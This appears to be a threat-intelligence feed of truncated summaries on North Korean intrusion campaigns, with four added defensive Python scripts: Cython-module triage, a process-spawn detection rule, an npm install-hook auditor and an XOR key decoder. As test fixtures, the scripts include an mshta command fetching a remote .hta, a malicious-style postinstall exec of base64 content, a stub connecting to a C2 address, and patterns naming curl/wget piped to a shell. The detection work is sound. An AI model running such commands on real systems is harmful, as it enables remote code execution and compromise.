Fox-IT analyzed a Lazarus subgroup toolset used against financial and cryptocurrency organizations, overlapping with activity linked to AppleJeus, Citrine Sleet, UNC4736, and Gleaming Pisces. The intrusion chain uses DPAPILoader to decrypt victim-bound pa…
387 reports
Chainalysis tracks how OFAC has increasingly added cryptocurrency identifiers to sanctions designations, with several DPRK-linked cases showing how wallets, exchanges, bridges, DeFi services, and mixers support sanctions evasion. The DPRK-relevant section…
Red Asgard frames Lazarus-attributed fake coding interviews as an execution path into developer workstations rather than a traditional external exploit. The lure asks a developer to clone and run an interview repository on a machine that may already hold …
Red Asgard identifies five trojanized browser extensions tied to a Lazarus/Contagious Interview extension layer, masquerading as Bitwarden, Phantom, TronLink, Trust Wallet, and a Brave/MetaMask-themed wallet. The extensions resolve their command-and-contr…
SANS ISC analyzes an obfuscated Node.js stealer uploaded as `extracted-decoded.js`, with a heavily obfuscated execution wrapper but plain-text embedded payload modules. The malware targets Windows through WSL, macOS, and Linux, stealing Chromium-family br…
Trend Micro reports that Void Dokkaebi, also known as Famous Chollima, has migrated InvisibleFerret from readable Python scripts into Cython-compiled `.pyd` modules on Windows and `.so` modules on macOS. The campaign remains focused on software developers…
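Added example, not Trend Micro's detection content: a triage script that walks a package tree and scores each `.pyd`/`.so` extension module for Cython build markers, so a Python stealer that has moved from readable scripts into compiled modules still stands out. The marker strings (`cython_runtime`, `__pyx_`, `__Pyx_`), the "two marker families" threshold and the sample blobs are my assumptions for illustration.

```python
"""Heuristic triage for Cython-compiled Python extension modules.

Added example: scans a tree for .pyd/.so extension modules and scores
each one for strings that Cython emits into generated modules. The
marker list and threshold are assumptions, not published indicators.
"""
import os
import re
from typing import Dict, List

# Strings Cython emits into generated modules (assumed markers).
CYTHON_MARKERS = [b"cython_runtime", b"__pyx_", b"__Pyx_"]

# Every CPython extension exports PyInit_<modname>; its presence confirms
# the file is a loadable extension rather than a stray shared library.
PYINIT_RE = re.compile(rb"PyInit_[A-Za-z0-9_]+")

EXT_SUFFIXES = (".pyd", ".so")


def classify_module(name: str, data: bytes) -> Dict[str, object]:
    """Score one extension module's bytes for Cython markers."""
    hits = {m.decode(): data.count(m) for m in CYTHON_MARKERS}
    inits = sorted({m.decode() for m in PYINIT_RE.findall(data)})
    families = sum(1 for v in hits.values() if v)
    return {
        "file": name,
        "is_extension": bool(inits),
        "pyinit": inits,
        "marker_hits": hits,
        # Two distinct marker families is the assumed bar for "Cython-built".
        "cython_compiled": bool(inits) and families >= 2,
        "score": sum(hits.values()),
    }


def scan_tree(root: str) -> List[Dict[str, object]]:
    """Walk a directory and classify every .pyd/.so found (real-world entry point)."""
    results = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(EXT_SUFFIXES):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    results.append(classify_module(path, fh.read()))
    return results


# Constructed sample blobs standing in for real module bytes.
SAMPLE_CYTHON = (b"\x7fELF" + b"\x00" * 16 + b"PyInit_core\x00" +
                 b"cython_runtime\x00__pyx_unpickle\x00__Pyx_Raise\x00")
SAMPLE_PLAIN_C = b"MZ\x90\x00" + b"PyInit_speedups\x00" + b"plain C extension\x00"
SAMPLE_NOT_EXT = b"\x7fELF" + b"libcrypto helper\x00"

if __name__ == "__main__":
    for name, blob in [("core.so", SAMPLE_CYTHON),
                       ("speedups.pyd", SAMPLE_PLAIN_C),
                       ("helper.so", SAMPLE_NOT_EXT)]:
        print(classify_module(name, blob))
```

A hit only says "built with Cython", which plenty of legitimate packages are; the useful signal is a Cython module appearing where the project previously shipped plain `.py` files, or one sitting next to a small loader stub that imports it.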
AhnLab's April 2026 financial-sector review links WGear RCE exploitation to DPRK-relevant activity, noting that Andariel has repeatedly abused the vulnerability. In observed cases, the WGear process launched mshta to retrieve external HTML, download and e…
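Added example, not AhnLab's rule: detection logic for the parent-child pattern the summary describes, run over process-creation events. It flags script hosts and other LOLBins spawned by the application process, and raises severity when the child is mshta.exe with a remote URL on its command line. The Sysmon-style field names, the `wgear` image-name hint and the sample events are assumptions.

```python
"""Detection: script-host LOLBins spawned by a web application process.

Added example: evaluates process-creation events for mshta.exe (and
similar) launched by a server-side process. Field names, the parent
image hint and the sample events are assumptions for illustration.
"""
import re
from typing import Dict, List

# Assumed substring identifying the vulnerable application's process image.
SERVER_IMAGE_HINTS = ("wgear",)

# Children a web application process has no business spawning.
SUSPECT_CHILDREN = {"mshta.exe", "powershell.exe", "cmd.exe",
                    "rundll32.exe", "certutil.exe"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate_event(ev: Dict[str, str]) -> Dict[str, object]:
    """Return a verdict for one process-creation event."""
    parent = basename(ev.get("ParentImage", ""))
    child = basename(ev.get("Image", ""))
    urls = URL_RE.findall(ev.get("CommandLine", ""))
    parent_is_server = any(h in parent for h in SERVER_IMAGE_HINTS)
    verdict = {"alert": False, "severity": "none", "reason": "", "urls": urls}
    if parent_is_server and child in SUSPECT_CHILDREN:
        verdict["alert"] = True
        # mshta pulling remote HTML is the exact chain in the report; rank it highest.
        verdict["severity"] = "high" if (child == "mshta.exe" and urls) else "medium"
        verdict["reason"] = f"{parent} spawned {child}" + (" with remote URL" if urls else "")
    return verdict


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run evaluate_event over a batch and keep only the alerts."""
    out = []
    for ev in events:
        v = evaluate_event(ev)
        if v["alert"]:
            out.append({**v, "event": ev})
    return out


# Constructed events, not from any real incident log (198.51.100.0/24 is TEST-NET-2).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\WGear\WGearSvc.exe",
     "CommandLine": "mshta.exe http://198.51.100.7/index.hta"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\WGear\WGearSvc.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Users\u\report.hta"},
    {"Image": r"C:\Program Files\WGear\worker.exe",
     "ParentImage": r"C:\Program Files\WGear\WGearSvc.exe",
     "CommandLine": "worker.exe --serve"},
]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert["severity"], alert["reason"], alert["urls"])
```

The parent-image hint is the one piece that has to be tuned per environment; the rest of the rule (server process spawning a script host, remote URL on the command line) carries over to any web-facing application that should never launch interpreters.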
The episode covers an eleven-hour forensic window into a live adversary server tied to a Lazarus-attributed fake interview campaign. Researchers preserved a contested Windows machine while two password changes took place, exposing the operator workben…
EndPoint, formerly known as Midnight, is a Babuk-derived ransomware family that targets Windows, ESXi, and NAS environments and uses double extortion through encryption and data-leak threats. The malware supports argument-controlled encryption scope, dele…
OX Security identified a malicious npm package, terminal-logger-utils, with keylogger, infostealer, and RAT behavior and linked the activity to previously documented North Korean supply-chain campaigns. The package is triggered through a postinstall hook …
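Added example, not OX Security's tooling: an auditor for npm manifests that records every install-time lifecycle hook (`preinstall`, `install`, `postinstall`, `prepare`) and flags the patterns that usually mean code execution at install: inline `node -e`, network fetches, content piped to an interpreter, base64 decoding, `eval`, child processes. The package name in the sample manifest is the one from the report; its script contents are invented, and the regex rules are my heuristics.

```python
"""Audit npm package manifests for install-time hooks that run code.

Added example; the rules are heuristics, not OX Security's. The
malicious manifest is constructed: the package name is from the
report, the script body is invented for illustration.
"""
import json
import os
import re
from typing import Dict, List

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Each pattern is paired with a short label for the finding.
SUSPICIOUS = [
    (re.compile(r"\bnode\s+(-e|--eval)\b"), "inline JS evaluated at install"),
    (re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I), "network fetch during install"),
    (re.compile(r"\|\s*(sh|bash|node)\b"), "fetched content piped to interpreter"),
    (re.compile(r"\bbase64\b"), "base64-decoded content"),
    (re.compile(r"\beval\s*\("), "eval() in hook"),
    (re.compile(r"child_process|\bspawn\(|\bexec\("), "child process creation"),
]


def audit_manifest(pkg: Dict) -> List[str]:
    """Return findings for one parsed package.json dictionary."""
    findings = []
    scripts = pkg.get("scripts") or {}
    name = pkg.get("name", "<unnamed>")
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        # Any install hook is worth recording; most packages have none.
        findings.append(f"{name}: has {hook} hook: {cmd!r}")
        for pat, label in SUSPICIOUS:
            if pat.search(cmd):
                findings.append(f"{name}: {hook} -> {label}")
    return findings


def audit_node_modules(root: str) -> List[str]:
    """Walk node_modules and audit every package.json (real-world entry point)."""
    findings = []
    for dirpath, _, files in os.walk(root):
        if "package.json" in files:
            path = os.path.join(dirpath, "package.json")
            with open(path, encoding="utf-8") as fh:
                try:
                    findings.extend(audit_manifest(json.load(fh)))
                except json.JSONDecodeError:
                    findings.append(f"{path}: unparseable package.json")
    return findings


# Constructed manifests.
MALICIOUS_MANIFEST = {
    "name": "terminal-logger-utils",
    "version": "1.0.0",
    "scripts": {
        "postinstall": "node -e \"require('child_process').exec("
                       "Buffer.from('Y3VybCAuLi4=','base64').toString())\"",
    },
}
BENIGN_MANIFEST = {
    "name": "left-pad-ish",
    "version": "1.0.0",
    "scripts": {"test": "node test.js", "build": "tsc -p ."},
}

if __name__ == "__main__":
    for line in audit_manifest(MALICIOUS_MANIFEST) + audit_manifest(BENIGN_MANIFEST):
        print(line)
```

Run `audit_node_modules("node_modules")` after a fresh install; `npm install --ignore-scripts` is the preventive counterpart, with hooks re-enabled only for packages reviewed this way.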
Krypt3ia assesses that North Korean cyber operations have shifted from separate espionage, financial theft, and disruptive tracks into an interconnected access-generation ecosystem. The report links fraudulent remote IT-worker schemes, developer-targeting…
Bitso described another suspected North Korean Chollima job applicant who attempted to interview for an engineering role under the claimed identity of Camilo Andrés Pantoja from Colombia. During the call, a Canary Token link exposed that the applicant con…
OpenSourceMalware found three malicious npm packages linked to the March 2026 Axios compromise through the shared XOR key OrDeR_7077, while using separate C2 infrastructure at 18.208.244.120:9999. The packages redeem-onchain-sdk, nicegui, and period-newli…
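Added example, not OpenSourceMalware's tooling: the repeating-key XOR triage that lets a shared key like OrDeR_7077 tie packages together. It decodes a blob under a candidate key, checks whether the result reads as text, and recovers a key from a known plaintext prefix, which is how a key found in one sample gets confirmed against the next. The key and the C2 address are from the report; the sample payload and the wrong key are constructed.

```python
"""Repeating-key XOR triage for payload blobs sharing a key across packages.

Added example: decodes a blob with a candidate key, tests plausibility
of the result, and recovers a key from a known-plaintext prefix. The
key OrDeR_7077 is from the report; the payload is constructed.
"""
import string
from itertools import cycle
from typing import Iterable, Optional

PRINTABLE = set(string.printable.encode())


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key (symmetric: encode and decode)."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def looks_like_text(data: bytes, threshold: float = 0.97) -> bool:
    """Crude plausibility check: nearly every byte is printable ASCII."""
    if not data:
        return False
    return sum(b in PRINTABLE for b in data) / len(data) >= threshold


def try_known_keys(blob: bytes, keys: Iterable[str]) -> Optional[str]:
    """Return the first key under which the blob decodes to plausible text."""
    for key in keys:
        if looks_like_text(xor_bytes(blob, key.encode())):
            return key
    return None


def recover_key(blob: bytes, known_prefix: bytes, key_len: int) -> bytes:
    """Recover a repeating key from a known plaintext prefix of >= key_len bytes."""
    if len(known_prefix) < key_len:
        raise ValueError("known prefix shorter than key length")
    # ciphertext XOR plaintext gives back the key stream for those positions.
    return xor_bytes(blob[:key_len], known_prefix[:key_len])


# Constructed stage-two stub; only the C2 address comes from the report.
SAMPLE_PLAINTEXT = (b'const C2 = "18.208.244.120:9999";\n'
                    b'require("net").connect(9999, "18.208.244.120");\n')
SHARED_KEY = "OrDeR_7077"
SAMPLE_BLOB = xor_bytes(SAMPLE_PLAINTEXT, SHARED_KEY.encode())

if __name__ == "__main__":
    print(try_known_keys(SAMPLE_BLOB, ["wrong-key", SHARED_KEY]))
    print(recover_key(SAMPLE_BLOB, b"const C2 = ", len(SHARED_KEY)))
```

The known-prefix recovery is the practical trick: loaders of this kind usually decode to a predictable opener (a `const`, `require`, or `function` line), so a handful of guessed prefixes is enough to pull the key out of a new sample and check it against the one already on file.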
Attackers are sharpening established methods rather than abandoning them, using offensive tooling, infostealers, ransomware affiliates, social engineering, and trusted-platform abuse with greater speed and resilience. Bridewell highlights adversary infras…
A DPRK-linked TraderTraitor/UNC4899 actor stole 116,500 rsETH, worth about $292 million, from the KelpDAO rsETH bridge on April 18, 2026. The intrusion began with social engineering against a LayerZero Labs developer on March 6, enabling session-key theft…